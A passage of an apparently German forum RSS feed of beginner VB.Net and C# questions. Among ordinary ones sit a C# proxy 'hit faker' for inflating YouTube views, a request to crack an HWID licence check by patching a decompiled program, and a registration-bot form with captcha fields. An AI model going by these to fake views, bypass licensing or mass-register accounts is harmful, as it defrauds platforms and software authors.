]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>One Way</dc:creator>
			<guid isPermaLink="true">net-94/richtextbox-einzelne-zeile-leerzeichen-entfernen-21321</guid>
		</item>
		<item>
			<title>VB.Net Fortschritt speichern?</title>
			<link>net-94/fortschritt-speichern-21310?goto=newpost</link>
			<pubDate>Sun, 10 Mar 2013 12:59:25 GMT</pubDate>
			<description>Moin. 
 
Ich möchte in Visual Basic etwas erstellen, wenn nach bestimmten Aktivitäten z.B. bei einem Label 20 steht und dadurch 
Button1.Enabled =...</description>
			<content:encoded><![CDATA[<div>Moin.<br />
<br />
Ich möchte in Visual Basic etwas erstellen, wenn nach bestimmten Aktivitäten z.B. bei einem Label 20 steht und dadurch<br />
Button1.Enabled = True wird wie kann man das machen dass wenn man das Programm schließt und wieder öffnet Button1.Enabled = True<br />
immernoch ist? Also man muss es nicht nochmal schaffen das beim Label eine 20 steht.<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/fortschritt-speichern-21310</guid>
		</item>
		<item>
			<title><![CDATA[C# Methode "im Hintergrund" ausführen]]></title>
			<link>net-94/methode-im-hintergrund-ausfuehren-21215?goto=newpost</link>
			<pubDate>Thu, 07 Mar 2013 12:47:27 GMT</pubDate>
			<description>Hallo, folgende Situation: 
 
Ich habe eine Windows-Form mit einem Button und einem Label, 
bei einem Klick auf den Button wird folgender Code...</description>
			<content:encoded><![CDATA[<div>Hallo, folgende Situation:<br />
<br />
Ich habe eine Windows-Form mit einem Button und einem Label,<br />
bei einem Klick auf den Button wird folgender Code ausgeführt:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
for (int i = 1; i &lt;= 100; i++)<br />
            {<br />
                label1.Text = i.ToString();<br />
                System.Threading.Thread.Sleep(100);<br />
            }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Mein Problem ist, dass sich die Form &quot;aufhängt&quot;, während diese Schleife durchlaufen wird, man keinen anderen Button mehr klicken kann und ich nicht die Veränderung des Label-Textes sehen kann, sondern dort direkt 100 steht nachdem die Schleife durchlaufen wurde.<br />
<br />
Derartige Projekte habe ich bis jetzt immer mit einer Konsolenanwendung realisiert, weil dort die Ausgabe so aussehen würde:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			1<br />
2<br />
3<br />
4<br />
5<br />
6<br />
7
			
		<hr />
	</div>
</div>Gibt es eine Möglichkeit diese Methode &quot;im Hintergrund&quot; auszuführen, sodass auch andere Buttons weiterhin anklickbar sind und ich auch alle 100ms eine Veränderung des Label-Textes sehe?<br />
<br />
Ich hoffe ich habe mich verständlich ausgedrückt.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/methode-im-hintergrund-ausfuehren-21215</guid>
		</item>
		<item>
			<title>C# Objektorientiert Programmieren</title>
			<link>net-94/objektorientiert-programmieren-21181?goto=newpost</link>
			<pubDate>Tue, 05 Mar 2013 21:28:53 GMT</pubDate>
			<description>Nabend, ich will gerne wieder anfangen mit C# zu programmieren, mir fehlen aber leider wie immer die richtigen Ideen. 
 
Das Ganze soll natürlich...</description>
			<content:encoded><![CDATA[<div>Nabend, ich will gerne wieder anfangen mit C# zu programmieren, mir fehlen aber leider wie immer die richtigen Ideen.<br />
<br />
Das Ganze soll natürlich objektorientiert aufgebaut sein und ich will dabei auf jeden Fall etwas lernen.<br />
<br />
Deshalb ist jede Idee gerne gesehen, die wirklich sinnvoll ist und sich auch im legalen Bereich befindet, also auch keine Game-Hacks oder so einen Quatsch :P</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/objektorientiert-programmieren-21181</guid>
		</item>
		<item>
			<title>Problem mit Replace</title>
			<link>net-94/problem-mit-replace-21152?goto=newpost</link>
			<pubDate>Mon, 04 Mar 2013 20:51:44 GMT</pubDate>
			<description><![CDATA[Moin ich habe das Problem: 
 
Wenn ich hier auf den Button drücke wird mit st angezeigt stat "Hund gesehen" Oo 
 
 
Code: 
--------- 
       ...]]></description>
			<content:encoded><![CDATA[<div>Moin ich habe das Problem:<br />
<br />
Wenn ich hier auf den Button drücke wird mit st angezeigt stat &quot;Hund gesehen&quot; Oo<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; &nbsp; TextBox1.Text = &quot;Gestern habe ich einen Hund gesehen&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Ende As String = &quot; gesehen&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Anfang As String = &quot;einen &quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; TextBox2.Text = TextBox1.Text.Split(Anfang)(1)</code><hr />
</div>Jemmand ne Plan warum?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/problem-mit-replace-21152</guid>
		</item>
		<item>
			<title>C# - Gerätemanager</title>
			<link>net-94/c-geraetemanager-20299?goto=newpost</link>
			<pubDate>Thu, 31 Jan 2013 17:08:50 GMT</pubDate>
			<description>Hallo Community, 
 
gibt es eine Möglichkeit ein Gerät zu deaktivieren? 
Bisher geling mir nichts und die Suche in Google war auch erfolglos.</description>
			<content:encoded><![CDATA[<div>Hallo Community,<br />
<br />
gibt es eine Möglichkeit ein Gerät zu deaktivieren?<br />
Bisher geling mir nichts und die Suche in Google war auch erfolglos.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Kuchenmaster</dc:creator>
			<guid isPermaLink="true">net-94/c-geraetemanager-20299</guid>
		</item>
		<item>
			<title>VB.Net Problem mit Rechten?</title>
			<link>net-94/problem-mit-rechten-20163?goto=newpost</link>
			<pubDate>Sat, 26 Jan 2013 22:46:28 GMT</pubDate>
			<description>Hallo, 
Ich habe ein kleines Problem undzwar wenn ich versuche in C:\ ein ordner zu erstellen kommt irgendeine Fehlermeldung es fehlen mir die rechte...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
Ich habe ein kleines Problem undzwar wenn ich versuche in C:\ ein ordner zu erstellen kommt irgendeine Fehlermeldung es fehlen mir die rechte<br />
<br />
Verwendeter code<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">MkDir(&quot;c:\applet&quot;)</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/problem-mit-rechten-20163</guid>
		</item>
		<item>
			<title>VB.Net multipart/form-data ?!</title>
			<link>net-94/multipart-form-data-19787?goto=newpost</link>
			<pubDate>Mon, 14 Jan 2013 19:11:58 GMT</pubDate>
			<description>Moin, 
 
ich wollte mich gerade an einen Registrationsbot setzen als mir auffiel, dass ich noch nie mit so einer Art von Post-Parametern gearbeitet...</description>
			<content:encoded><![CDATA[<div>Moin,<br />
<br />
ich wollte mich gerade an einen Registrationsbot setzen als mir auffiel, dass ich noch nie mit so einer Art von Post-Parametern gearbeitet hab...<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;authenticity_token&quot;<br />
<br />
9YNvVgkJLYWkGSmPmmwUMf60/3oCRJeyKxJfP17O4qM=<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[login]&quot;<br />
<br />
Afafasq<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[name]&quot;<br />
<br />
Christoph Stein<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[password]&quot;<br />
<br />
BLABLABLA<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[password_confirmation]&quot;<br />
<br />
BLABLABLA<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[email]&quot;<br />
<br />
Afafasq@asd.us<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;user[language_id]&quot;<br />
<br />
14<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;captcha&quot;<br />
<br />
ixnijr<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;captcha_key&quot;<br />
<br />
15214229904d1fb41ed34d33b4dd8e07bdd3141b<br />
-----------------------------327251504831772<br />
Content-Disposition: form-data; name=&quot;commit&quot;<br />
<br />
Registrieren<br />
-----------------------------327251504831772--</code><hr />
</div>Nun ist meine frage,<br />
wie krig ich es hin dies an die Website zu posten?<br />
Ich habe bereits gegoogelt, jedoch hab ich dort nur halb fertige Bilderupload-Codes gefunden...<br />
<br />
Naja, vielleicht kann mir ja hier einer weiterhelfen ;)<br />
<br />
LG<br />
Baumstumpf</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Baumstumpf</dc:creator>
			<guid isPermaLink="true">net-94/multipart-form-data-19787</guid>
		</item>
		<item>
			<title>C# Youtube Hitfaker</title>
			<link>net-94/youtube-hitfaker-19457?goto=newpost</link>
			<pubDate>Sun, 06 Jan 2013 14:52:07 GMT</pubDate>
			<description>Hey. 
Ich versuche einen Hitfaker für Youtube Videos zu schreiben. 
Habe es zum testen schon mit diversen Countern wie zb ebay Auktionen getestet, da...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
Ich versuche einen Hitfaker für Youtube Videos zu schreiben.<br />
Habe es zum testen schon mit diversen Countern wie zb ebay Auktionen getestet, da funktioniert alles einwandfrei. <br />
Auf Youtube bekomme ich aber keine Aufrufe. Kann mir da jemand helfen wo der Fehler liegt?<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">public void Hitfake(string target, WebProxy proxy)<br />
{<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest request = (HttpWebRequest)WebRequest.Create(target);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; request.Proxy = proxy<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; request.UserAgent = &quot;Mozilla/5.0(Windows; U; Windows NT 5.1; de; rv:1.9.0.10)Gecko/2009042316 Firefox/17.0.1(.NET CLR 4.0.20506)&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; request.Accept = &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; request.MediaType = &quot;HTTP/1.1&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; request.ContentType = &quot;text/xml&quot;;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HttpWebResponse response = (HttpWebResponse)request.GetResponse();<br />
}</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Minecraft</dc:creator>
			<guid isPermaLink="true">net-94/youtube-hitfaker-19457</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net BiESi's VB.net Theme Archive]]></title>
			<link>net-94/biesi-s-vb-net-theme-archive-19066?goto=newpost</link>
			<pubDate>Sat, 22 Dec 2012 10:11:46 GMT</pubDate>
			<description>Theme Archive für Visual Basic. 
 
_Wozu ist das ?_ 
 
#Dieses Archive enthält 30 verschiedene Themes/Designs die du ganz einfach in deine Programme...</description>
			<content:encoded><![CDATA[<div>Theme Archive für Visual Basic.<br />
<br />
<font color="#FFD700"><u>Wozu ist das ?</u></font><br />
<br />
<font color="#008000">#</font>Dieses Archive enthält 30 verschiedene Themes/Designs die du ganz einfach in deine Programme einbauen kannst.<br />
<br />
<font color="#FFD700"><u>How to use</u></font><br />
<br />
<font color="#008000">#</font>.exe starten<br />
<font color="#008000">#</font>Ein Design was dir gefällt auswählen &amp; auf dem Desktop speichern<br />
<font color="#008000">#</font>Ein Project in Visual Basic erstellen<br />
<font color="#008000">#</font>Die Theme.vb via Drag &amp; Drop in dein project einbauen und debuggen (f5)<br />
<font color="#008000">#</font>Dann hast du oben in der ToolBox dein Design.<br />
<br />
<u>Screenshot</u><br />
<br />
<a href="http://www.u-img.net/view/2913Xq.jpg" target="_blank"><img src="http://u-img.net/img/2913Xq_thumb.jpg" border="0" alt="" /></a><br />
KLICKE AUF DAS BILD UM ES RICHTIG ZU ERKENNEN!<br />
<br />
<br />
<br />
<u>Theme List</u><br />
 -Adobe Theme by Tedd<br />
 -Avantium Theme by aeonhack<br />
 -Beyond Theme by aeonhack<br />
 -Bullion Theme by aeonhack<br />
 -Classic Theme by Eprouvez<br />
 -Crystal Theme by Mavamaarten<br />
 -Dark Matter by aeonhack<br />
 -Electric Theme by Hydrogen<br />
 -Electrified Theme by AlphaSquad<br />
 -Evolve Theme by Mavamaarten<br />
 -Flow Theme by aeonhack<br />
 -Fusion Theme by aeonhack<br />
 -Future Theme by aeonhack<br />
 -Genuine Theme by aeonhack<br />
 -Ghost Theme by Mavamaarten<br />
 -Green Theme by Darkfired<br />
 -HFx Theme by Slurms Makenzi<br />
 -Insomnia Theme by SoulZeh<br />
 -Prime Theme by aeonhack<br />
 -Purityx Theme by Slurms Makenzi<br />
 -Rockstar Theme by Slurms Makenzi<br />
 -Simply Gray Theme by Hydrogen<br />
 -Steam Theme by aeonhack<br />
 -Studio Theme by aeonhack<br />
 -Tennis Theme by SoulZeh<br />
 -The Black Theme by hav0c1995<br />
 -The Blue Theme by hav0c1995<br />
 -Thief3 Theme by iZ3RO (ZerO)<br />
 -Youtube Theme<br />
 -Zeus Theme by DownFall.<br />
<br />
<font color="#FFD700">Info's:</font><br />
<br />
<a href="https://www.virustotal.com/file/d45861879477ade26ed4f0b440ab3c957869ea7975622d94ff6c7d61201cb019/analysis/1347300780/" target="_blank" rel="nofollow">VIRUSTOTAL</a><br />
DOWNLOAD:<br />
<a href="http://www.file-upload.net/download-6957502/Theme-Archive.rar.html" target="_blank" rel="nofollow">Download!</a><br />
<br />
<font color="#FFD700">MFG Bazs</font><br />
<br />
<br />
<br />
<a href="http://cheat-sector.org/showthread.php?4346-BiESi-s-VB-net-Theme-Archive" target="_blank" rel="nofollow">Quelle</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/biesi-s-vb-net-theme-archive-19066</guid>
		</item>
		<item>
			<title>C# Betriebssysteminformationen</title>
			<link>net-94/betriebssysteminformationen-18892?goto=newpost</link>
			<pubDate>Sat, 15 Dec 2012 21:27:16 GMT</pubDate>
			<description>Ich schreibe ein Programm, wofür es notwendig ist, Informationen über das Betriebssystem auszulesen. Ich habe das jetzt folgendermaßen realisiert: 
...</description>
			<content:encoded><![CDATA[<div>Ich schreibe ein Programm, wofür es notwendig ist, Informationen über das Betriebssystem auszulesen. Ich habe das jetzt folgendermaßen realisiert:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">HTML-Code:</div>
	<hr /><code class="bbcode_code">using System.Management;<br />
<br />
&#91;...&#93;<br />
<br />
string osTempName;<br />
string&#91;&#93; osName;<br />
<br />
ManagementObjectSearcher OS = new ManagementObjectSearcher(&quot;SELECT * FROM Win32_OperatingSystem&quot;);<br />
ManagementObjectCollection queryCollection = OS.Get();<br />
<br />
foreach (ManagementObject mo in queryCollection) {<br />
osTempName = mo&#91;&quot;name&quot;&#93;.ToString();<br />
osName = osTempName.Split('|');<br />
lblOsName.Text = osName&#91;0&#93;;<br />
lblOsVersion.Text = mo&#91;&quot;version&quot;&#93;.ToString();<br />
lblOsManufacturer.Text = mo&#91;&quot;Manufacturer&quot;&#93;.ToString();<br />
&#91;...&#93;<br />
}</code><hr />
</div>Meine Frage ist bei dem Teil <b>osTempName = mo[&quot;name&quot;].ToString();</b>. Unter Windows XP enthält der Name folgendes:<br />
<i>Microsoft Windows XP Home Edition|C:\WINDOWS|\Device\Harddisk0\Partition1</i><br />
Wird das in einem anderen Windows-Betriebssystem anders gespeichert und kann ich auch irgendwoher die Bitversion (32 oder 64) auslesen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pwned</dc:creator>
			<guid isPermaLink="true">net-94/betriebssysteminformationen-18892</guid>
		</item>
		<item>
			<title><![CDATA[[S]Hilfe - Programm cracken.]]></title>
			<link>net-94/s-hilfe-programm-cracken-18727?goto=newpost</link>
			<pubDate>Sun, 09 Dec 2012 21:57:01 GMT</pubDate>
			<description>Habe hier ein Programm, welches eine HWID benötigt. Die HWID wird so abgefragt: 
 
 
Code: 
--------- 
Private Sub Form2_Load(ByVal sender As Object,...</description>
			<content:encoded><![CDATA[<div>Habe hier ein Programm, welches eine HWID benötigt. Die HWID wird so abgefragt:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Sub Form2_Load(ByVal sender As Object, ByVal e As EventArgs)<br />
&nbsp; &nbsp; Me.Opacity = 255<br />
&nbsp; &nbsp; Dim text As String = WindowsIdentity.GetCurrent.User.Value.Replace(&quot;-&quot;, &quot;&quot;)<br />
&nbsp; &nbsp; Dim request As HttpWebRequest = DirectCast(WebRequest.Create(&quot;http://www.fileden.com/files/2012/12/2/3372286/tskypehwid.txt&quot;), HttpWebRequest)<br />
&nbsp; &nbsp; Dim response As HttpWebResponse = DirectCast(request.GetResponse, HttpWebResponse)<br />
&nbsp; &nbsp; Dim str2 As String = New StreamReader(response.GetResponseStream).ReadToEnd<br />
&nbsp; &nbsp; Dim str3 As String = [text]<br />
&nbsp; &nbsp; If str2.Contains(str3) Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim size2 As New Size(1, 1)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Size = size2<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Opacity = 0<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Hide<br />
&nbsp; &nbsp; &nbsp; &nbsp; MyProject.Forms.Form1.Show<br />
&nbsp; &nbsp; Else<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Opacity = 255<br />
&nbsp; &nbsp; &nbsp; &nbsp; Clipboard.SetText([text])<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.TextBox1.Text = str3<br />
&nbsp; &nbsp; End If<br />
End Sub</code><hr />
</div>So, wenn man sich den Link ansieht, sind dort 2 HWIDs (irrelevant).<br />
Nun habe ich den Link auf meiner HP, wo ich meine HWID hochgeladen habe, also ich soll den Code der kommt, wenn ich die Form öffne zum Coder schicken und dann schaltet er es frei. Da es (denke ich) nur auf die Seite hochgeladen wird, einfach Seite in meiner geändert, also meine HWID auf ner Webspace hinzugefügt und Link geändert im Programm (Dank Flav's tutorial mit dem .NET Reflector) geändert, bzw mit Reflexil 1.5.<br />
<br />
Aber es funktioniert trotzdem nicht, es kommt weiterhin ich muss die freischalten lassen, kann sich das mal einer anschauen?<br />
<br />
Tool: <a href="http://www.xup.in/dl,41774731/tSkype_Tool.exe/" target="_blank" rel="nofollow">Download: tSkype_Tool.exe | xup.in</a><br />
<br />
MfG,<br />
Klaus Bukakke<br />
<br />
E: Fuck falsches Sub, selfreported.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Klaus Bukkake</dc:creator>
			<guid isPermaLink="true">net-94/s-hilfe-programm-cracken-18727</guid>
		</item>
		<item>
			<title>VB.Net Einzelnes Zeichen aus String entfernen</title>
			<link>net-94/einzelnes-zeichen-aus-string-entfernen-18637?goto=newpost</link>
			<pubDate>Thu, 06 Dec 2012 14:57:55 GMT</pubDate>
			<description>Hi! 
 
Ich habe in Visual Basic eine Datei und in meinem String steht C:\\Test.txt aber ich brauche C:\Text.txt 
Wie kann ich den zweiten \ entfernen?</description>
			<content:encoded><![CDATA[<div>Hi!<br />
<br />
Ich habe in Visual Basic eine Datei und in meinem String steht C:\\Test.txt aber ich brauche C:\Text.txt<br />
Wie kann ich den zweiten \ entfernen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gurke</dc:creator>
			<guid isPermaLink="true">net-94/einzelnes-zeichen-aus-string-entfernen-18637</guid>
		</item>
		<item>
			<title>VB.Net Suche Hilfe, will ein Bestellformular-programm basteln</title>
			<link>net-94/suche-hilfe-will-ein-bestellformular-programm-basteln-18412?goto=newpost</link>
			<pubDate>Wed, 28 Nov 2012 16:19:49 GMT</pubDate>
			<description>Hallo Leute, 
 
ich brauche eure Hilfe, ich will ein Bestell-Programm basteln. 
 
Mein Problem ist, ich weiß den Code vom Normalen Feedback-Formular...</description>
			<content:encoded><![CDATA[<div>Hallo Leute,<br />
<br />
ich brauche eure Hilfe, ich will ein Bestell-Programm basteln.<br />
<br />
Mein Problem ist, ich weiß den Code vom Normalen Feedback-Formular wie bei meinen anderen Programmen, blos jetzt kommt dort auch noch etwas dazu, die Comboboxen, ich wollte es nun so haben, das es dann so in der E-Mail stehen haben:<br />
<br />
<ul><li style="">Menge: XXM Gold ~ X €uro</li><li style="">Welt: XXX</li><li style="">Der EPVP Name des Users: XXX</li><li style="">Zahlungsart: PayPal z.B.</li></ul><br />
<br />
<br />
Und so das es je nachdem welchen Händler man ausgewählt hat, dann dies für den Jeweiligen Händler gilt, da habe ich mir gedacht, mehrere gleiche Formen, für jeden einzelnen Händler, dies ist aber umständlich, gibt es da eine bessere lösung? Ich will dies erstmal nur Probemäßig für mich selbst, ich wollte schauen ob das evtl. irgendwie klappt, kann mir jemand da vlt. mal n sorcecode geben bzw. was ich im Feedback Formular eingeben soll, damit es alles abgesendet wird?<br />
<br />
Hier ein Bild wie es aussieht:<br />
<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i50.tinypic.com/2cnzayu.jpg"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
Hier der Sorcecode vom Feedback-Formular:<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Imports System.Net.Mail<br />
<br />
Public Class frmFeedback<br />
<br />
&nbsp; &nbsp; Private Sub CrystalClearButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CrystalClearButton2.Click<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CrystalClearTextBox1.Text = &quot;&quot;<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub CrystalClearButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CrystalClearButton1.Click<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Msg As New MailMessage<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim myCredentials As New System.Net.NetworkCredential<br />
&nbsp; &nbsp; &nbsp; &nbsp; myCredentials.UserName = &quot;ABSENDER EMAIL&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; myCredentials.Password = &quot;ABSENDER PW&quot;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Msg.IsBodyHtml = False<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim mySmtpsvr As New SmtpClient()<br />
&nbsp; &nbsp; &nbsp; &nbsp; mySmtpsvr.Host = &quot;smtp.web.de&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; mySmtpsvr.Port = 25<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; mySmtpsvr.UseDefaultCredentials = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; mySmtpsvr.Credentials = myCredentials<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Msg.From = New MailAddress(&quot;ABSENDER&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Msg.To.Add(&quot;EMPFÄNGER&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Msg.Subject = &quot;Feedback&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Msg.Body = CrystalClearTextBox1.Text<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mySmtpsvr.Send(Msg)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MsgBox(&quot;Vielen Dank für dein Feedback!&quot; &amp; vbNewLine &amp; &quot;Wir werden uns schnellstmöglichst deine Nachricht durchlesen und ggf. umsetzen.&quot;, MsgBoxStyle.Information, Title:=&quot;Feedback gesendet!&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Catch ex As Exception<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MsgBox(Err.Number &amp; ex.Message &amp; ex.StackTrace.ToString)<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Try<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Enabled = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; Label3.Visible = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Hide()<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub CrystalClearButton3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CrystalClearButton3.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Enabled = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; Label3.Visible = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.Hide()<br />
&nbsp; &nbsp; End Sub<br />
End Class</code><hr />
</div>
</div>
</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/suche-hilfe-will-ein-bestellformular-programm-basteln-18412</guid>
		</item>
		<item>
			<title>(S) Hilfe VB C#</title>
			<link>net-94/s-hilfe-vb-c-18401?goto=newpost</link>
			<pubDate>Wed, 28 Nov 2012 09:56:41 GMT</pubDate>
			<description>Hallo Leute. 
Ich brauche eure Hilfe. 
Wie kann ich bei VB C# eine new-Anweisung erstellen? bzw. was ist das? 
 
 
 
Danke</description>
			<content:encoded><![CDATA[<div>Hallo Leute.<br />
Ich brauche eure Hilfe.<br />
Wie kann ich bei VB C# eine new-Anweisung erstellen? bzw. was ist das?<br />
<br />
<br />
<br />
Danke</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Hexefabi</dc:creator>
			<guid isPermaLink="true">net-94/s-hilfe-vb-c-18401</guid>
		</item>
		<item>
			<title>Auf bestimmte Farbbereiche klicken</title>
			<link>net-94/auf-bestimmte-farbbereiche-klicken-18354?goto=newpost</link>
			<pubDate>Mon, 26 Nov 2012 20:03:47 GMT</pubDate>
			<description>Mir ist eben eine Idee gekommen und ich weiß nicht, ob man sie verwirklichen kann. Vorab, ich habe über Google nicht wirklich etwas gefunden. 
 
Ist...</description>
			<content:encoded><![CDATA[<div>Mir ist eben eine Idee gekommen und ich weiß nicht, ob man sie verwirklichen kann. Vorab, ich habe über Google nicht wirklich etwas gefunden.<br />
<br />
Ist es möglich, per WinAPI oder sonstiges ein .NET-Programm auf bestimmte Symbole klicken lassen kann, egal wie groß sie skaliert und gedreht sind?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pwned</dc:creator>
			<guid isPermaLink="true">net-94/auf-bestimmte-farbbereiche-klicken-18354</guid>
		</item>
		<item>
			<title>VB.Net Mittels VB fremde Applikationen steuern?</title>
			<link>net-94/mittels-vb-fremde-applikationen-steuern-18083?goto=newpost</link>
			<pubDate>Thu, 15 Nov 2012 18:57:35 GMT</pubDate>
			<description>Guten Abend, 
 
Ein Freund von mir lässt für ein Browsergame mehrere Bots (12-16) auf seinem PC laufen, welche öfter mal abstürzen. 
Ich habe mir...</description>
			<content:encoded><![CDATA[<div>Guten Abend,<br />
<br />
Ein Freund von mir lässt für ein Browsergame mehrere Bots (12-16) auf seinem PC laufen, welche öfter mal abstürzen.<br />
Ich habe mir überlegt ihm ein kleines Tool zu basteln, welches die Bots startet, die Accounts einloggt und gelegentlich prüft ob die Bots noch laufen um ggf neu zu starten.<br />
<br />
